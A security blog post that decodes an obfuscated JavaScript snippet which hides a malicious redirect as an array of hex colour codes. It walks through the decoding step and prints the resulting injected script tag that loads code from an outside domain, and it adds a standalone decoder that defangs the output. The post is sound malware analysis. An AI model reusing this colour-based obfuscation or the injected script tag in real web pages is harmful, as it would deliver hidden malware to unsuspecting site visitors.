Javascript Obfuscation Using Colors?

No, not at all, but the JavaScript code does look like it’s just trying to process hexadecimal representations of various colors. Let’s take a closer look at the script:

If this was found on a webpage, you might just overlook it as something benign. It’s a clever concept!

It starts off by defining an array of hexadecimal values which look like a representation of different colors.

new Array('#4b8272','#81787f','#832f83','#887f74','#4c3183','#748783','#3e7970',
'#857082','#728178','#7f8331','#2f8281','#724c31','#778383','#7f493e','#3e7a84',
'#82837e','#40403d','#727e7c','#3e7982','#3e7980','#847481','#883d7c','#787d3d',
'#7f777f','#314d00');

The function “div_pick_colors” concatenates them into one long string after ignoring the pound sign. You end up with this:

4b827281787f832f83887f744c31837487833e79708570827281787f83312f8281724c317783
837f493e3e7a8482837e40403d727e7c3e79823e7980847481883d7c787d3d7f777f314d00

The same function then grabs two characters at a time and does some fancy footwork to convert it into a malicious redirect. Here’s the code that does the conversion:

s += String.fromCharCode(parseInt(c_clr, 16) - 15);

Let’s go through this quickly…

Get the first two characters from the string above (which is “4b”).
Convert it from hexadecimal to decimal (you’ll get “75”).
Subtract 15 from the decimal value (which gives “60”).
Now convert the decimal value to ASCII (you’ll end up with “<”).

Now do the next one...

Get the second two characters (which is “82”).
Convert it from hex to decimal (you’ll get “130”).
Subtract 15 from the decimal value (which gives “115”).
Now convert the value to ASCII (you’ll end up with “s”).

If you continue along, you’ll end up with the following redirect code:

<script type="text/javascript" src="http://kusto11.com/js/jquery.min.php">

If you want to cheat, you can insert an alert into the script which will pop up the redirect code in one fell swoop.

The rest of the code appends the date/time value to the URL and executes the code.
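The conversion walked through above, as a standalone Node.js decoder an analyst can run without loading the page (an added example, not code from the malicious script or the original post). The function names, the marker list and the treatment of the trailing 00 as padding are assumptions; the offset search goes beyond the fixed shift of 15 described here, for samples where the shift is not known.

```javascript
// Color array copied from the page above.
const COLORS = [
  '#4b8272','#81787f','#832f83','#887f74','#4c3183','#748783','#3e7970',
  '#857082','#728178','#7f8331','#2f8281','#724c31','#778383','#7f493e','#3e7a84',
  '#82837e','#40403d','#727e7c','#3e7982','#3e7980','#847481','#883d7c','#787d3d',
  '#7f777f','#314d00'];

// Turn the "colors" into byte values: drop '#', join, read two hex digits at a time.
function colorsToBytes(colors) {
  const hex = colors.map(c => c.replace(/^#/, '')).join('');
  if (!/^([0-9a-f]{2})*$/i.test(hex)) throw new Error('not a clean hex string');
  const pairs = hex.match(/.{2}/g) || [];
  // Assumption: trailing 00 pairs only pad the last color out to six digits.
  while (pairs.length && pairs[pairs.length - 1] === '00') pairs.pop();
  return pairs.map(p => parseInt(p, 16));
}

// Undo the shift for one offset; returns null if any byte leaves printable ASCII.
function decodeColors(colors, offset) {
  let s = '';
  for (const b of colorsToBytes(colors)) {
    const code = b - offset;
    if (code < 32 || code > 126) return null;
    s += String.fromCharCode(code);
  }
  return s;
}

// Recover the offset when it is unknown: keep only candidates that decode to
// printable text containing an injection marker (hypothetical marker list).
function findOffsets(colors, markers = ['<script', '<iframe', 'http']) {
  const hits = [];
  for (let offset = 0; offset < 256; offset++) {
    const text = decodeColors(colors, offset);
    if (text && markers.some(m => text.toLowerCase().includes(m))) {
      hits.push({ offset, text });
    }
  }
  return hits;
}

// Defang before printing so the result is safe to paste into a ticket.
const defang = s => s.replace(/http/gi, 'hxxp').replace(/\./g, '[.]');

for (const { offset, text } of findOffsets(COLORS)) {
  console.log(`offset ${offset}: ${defang(text)}`);
}
```

Because the decoder only does string arithmetic, the payload is never evaluated or fetched.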

In case you’re wondering what those hexadecimal values would actually look like if they were rendered as colors, they look like this:

It kinda looks like a scarf I got for Christmas.
